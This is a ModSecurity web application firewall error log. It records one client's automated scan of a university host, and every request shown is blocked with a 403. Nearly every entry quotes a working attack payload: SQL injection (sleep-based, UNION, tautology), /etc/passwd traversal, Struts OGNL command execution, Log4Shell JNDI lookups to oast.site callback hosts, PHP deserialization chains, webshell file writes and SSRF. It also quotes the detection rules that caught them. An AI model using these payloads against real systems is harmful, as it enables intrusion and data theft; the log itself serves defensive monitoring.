[Tue Aug 29 11:34:53.366791 2023] [:error] [pid 1303] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:template_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:template_id: 1 and sleep(6)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11bcCo-f0AAAUXLjQAAABM"]
[Tue Aug 29 11:34:55.373286 2023] [:error] [pid 1242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:rlist[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: @`'`,  found within ARGS:rlist[]: @`'`, extractvalue(1, concat_ws(0x20, 0x5c,(select md5(999999999)))),@`'`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/comment/api/index.php"] [unique_id "ZO11b8Co-f0AAATavu8AAAAg"]
[Tue Aug 29 11:34:56.309200 2023] [:error] [pid 1281] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22,\\x22<? found within ARGS:content: <?php file_put_contents(\\x222Udxlb4qUcCcHIzUrBC9eAPkNPN.php\\x22,\\x22<?php echo phpinfo();\\x22);"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11cMCo-f0AAAUB02EAAAA5"]
[Tue Aug 29 11:34:56.343851 2023] [:error] [pid 1293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{}} found within ARGS:cmd: {\\x22/expandocolumn/add-column\\x22:{}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/api/jsonws/invoke"] [unique_id "ZO11cMCo-f0AAAUNak4AAABF"]
[Tue Aug 29 11:34:56.345402 2023] [:error] [pid 1281] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '='' found within ARGS:email: '=''or'@email.com"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/login.php"] [unique_id "ZO11cMCo-f0AAAUB02IAAAA5"]
[Tue Aug 29 11:34:57.332384 2023] [:error] [pid 1309] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{}} found within ARGS:cmd: {\\x22/expandocolumn/add-column\\x22:{}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/api/jsonws/invoke"] [unique_id "ZO11ccCo-f0AAAUdm4QAAABS"]
[Tue Aug 29 11:34:57.348568 2023] [:error] [pid 1305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:table_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:table_id: ' AND (SELECT 1 FROM (SELECT(SLEEP(6)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/dashboard/view-chair-list.php"] [unique_id "ZO11ccCo-f0AAAUZcF8AAABO"]
[Tue Aug 29 11:34:57.353165 2023] [:error] [pid 1354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pid: 0 echo start cat/etc/passwd echo end "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/linuxki/experimental/vis/kivis.php"] [unique_id "ZO11ccCo-f0AAAVK0HMAAAAB"]
[Tue Aug 29 11:34:58.307389 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:lang: ../../thinkphp/base"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11csCo-f0AAAPLwKEAAAAX"]
[Tue Aug 29 11:34:59.304679 2023] [:error] [pid 1265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:lang: ../../../../../vendor/topthink/think-trace/src/TraceDebug"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11c8Co-f0AAATxvY0AAAAw"]
[Tue Aug 29 11:35:01.299978 2023] [:error] [pid 1360] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:id: %{(#instancemanager=#application[\\x22org.apache.tomcat.InstanceManager\\x22]).(#stack=#attr[\\x22com.opensymphony.xwork2.util.ValueStack.ValueStack\\x22]).(#bean=#instancemanager.newInstance(\\x22org.apache.commons.collections.BeanMap\\x22)).(#bean.setBean(#stack)).(#context=#bean.get(\\x22context\\x22)).(#bean.setBean(#context)).(#macc=#bean.get(\\x22memberAccess\\x22)).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance(\\x22java.util.HashSet\\x22)).(#bean.put(\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11dcCo-f0AAAVQYxsAAAAI"]
[Tue Aug 29 11:35:02.318637 2023] [:error] [pid 1289] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:blowf. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:blowf: system('echo CVE-2022-1609 | rev');"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-json/am-member/license"] [unique_id "ZO11dsCo-f0AAAUJIzIAAABB"]
[Tue Aug 29 11:35:02.328139 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:user[searchprefs]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :\\x22\\x00*\\x00 found within ARGS:user[searchprefs]: a:2:{i:0;O:27:\\x22googlelogin_vendor_autoload\\x22:0:{}i:1;O:32:\\x22Monolog\\x5cHandler\\x5cSyslogUdpHandler\\x22:1:{s:9:\\x22\\x00*\\x00socket\\x22;O:29:\\x22Monolog\\x5cHandler\\x5cBufferHandler\\x22:7:{s:10:\\x22\\x00*\\x00handler\\x22;r:4;s:13:\\x22\\x00*\\x00bufferSize\\x22;i:-1;s:9:\\x22\\x00*\\x00buffer\\x22;a:1:{i:0;a:2:{i:0;s:14:\\x22CVE-2023-25135\\x22;s:5:\\x22level\\x22;N;}}s:8:\\x22\\x00*\\x00level\\x22;N;s:14:\\x22\\x00*\\x00initialized\\x22;b:1;s:14:\\x22\\x00*\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/ajax/api/user/save"] [unique_id "ZO11dsCo-f0AAATUxRsAAAAW"]
[Tue Aug 29 11:35:03.303241 2023] [:error] [pid 1289] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_dlg[captcha][target]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c')\\x5c found within ARGS:_dlg[captcha][target]: system(\\x5c'ver\\x5c')\\x5c"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/webmail/basic/"] [unique_id "ZO11d8Co-f0AAAUJIzQAAABB"]
[Tue Aug 29 11:35:03.318692 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:CSRF-TOKEN. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:CSRF-TOKEN: rnqvt{{shell_exec(cat/etc/passwd)}}to5gw"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11d8Co-f0AAATQXiQAAAAO"]
[Tue Aug 29 11:35:03.328849 2023] [:error] [pid 1300] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:name: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cat /etc/passwd').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11d8Co-f0AAAUUZ9AAAABK"]
[Tue Aug 29 11:35:04.317316 2023] [:error] [pid 1296] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:url: ${jndi:ldap://${:-490}${:-620}.${hostName}.url.cjmn8l5jmimk2adbbnlgkaadtu715fckk.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/api/geojson"] [unique_id "ZO11eMCo-f0AAAUQ7soAAABH"]
[Tue Aug 29 11:35:04.327620 2023] [:error] [pid 1303] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:order_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:order_id: 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11eMCo-f0AAAUXLkIAAABM"]
[Tue Aug 29 11:35:05.303858 2023] [:error] [pid 1291] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:error: ${jndi:ldap://${:-641}${:-850}.${hostName}.uri.cjmn8l5jmimk2adbbnlgwp5zaakm8phum.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/dr/authentication/oauth2/oauth2login"] [unique_id "ZO11ecCo-f0AAAULx9EAAABD"]
[Tue Aug 29 11:35:06.327567 2023] [:error] [pid 1361] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgxdgg7dbc6t6jm.oast.site# found within TX:1: cjmn8l5jmimk2adbbnlgxdgg7dbc6t6jm.oast.site#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/zimlet/com_zimbra_webex/httpPost.jsp"] [unique_id "ZO11esCo-f0AAAVRxc4AAAAQ"]
[Tue Aug 29 11:35:07.313508 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:time. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:time: 1)) UNION SELECT sleep(6) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11e8Co-f0AAATWYScAAAAa"]
[Tue Aug 29 11:35:07.341598 2023] [:error] [pid 1281] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'sWZA'='sWZA found within ARGS:id: aman' AND (SELECT 2844 FROM (SELECT(SLEEP(6)))FDTM) AND 'sWZA'='sWZA"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11e8Co-f0AAAUB028AAAA5"]
[Tue Aug 29 11:35:08.355114 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:username: vaday' or 1=1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/admin/login.php"] [unique_id "ZO11fMCo-f0AAASI0FUAAAAG"]
[Tue Aug 29 11:35:09.339015 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/wechat-broadcast/wechat/Image.php"] [unique_id "ZO11fcCo-f0AAAUKhBMAAABC"]
[Tue Aug 29 11:35:10.332449 2023] [:error] [pid 1360] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:page: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11fsCo-f0AAAVQYykAAAAI"]
[Tue Aug 29 11:35:10.351409 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"_fp_. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22_fp_: \\x22_fp_"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/HandleEvent"] [unique_id "ZO11fsCo-f0AAASI0FcAAAAG"]
[Tue Aug 29 11:35:10.363468 2023] [:error] [pid 1366] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:s: 1' AND (SELECT 1 FROM (SELECT(SLEEP(6)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11fsCo-f0AAAVWP-sAAAAV"]
[Tue Aug 29 11:35:12.321596 2023] [:error] [pid 1305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/server-status found within TX:1: 0177.0.0.1/server-status"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11gMCo-f0AAAUZcG4AAABO"]
[Tue Aug 29 11:35:12.378739 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11gMCo-f0AAASHh@EAAAAD"]
[Tue Aug 29 11:35:12.502205 2023] [:error] [pid 1265] [client 143.42.78.27] ModSecurity: Rule 7fe1ce5b6070 [id "981173"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "159"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11gMCo-f0AAATxvZkAAAAw"]
[Tue Aug 29 11:35:12.749976 2023] [:error] [pid 1265] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11gMCo-f0AAATxvZkAAAAw"]
[Tue Aug 29 11:35:13.381447 2023] [:error] [pid 1366] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/server-status found within TX:1: 0177.0.0.1/server-status"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11gcCo-f0AAAVWQAQAAAAV"]
[Tue Aug 29 11:35:14.297152 2023] [:error] [pid 1384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php/bbs/index/download"] [unique_id "ZO11gsCo-f0AAAVoB-8AAAAY"]
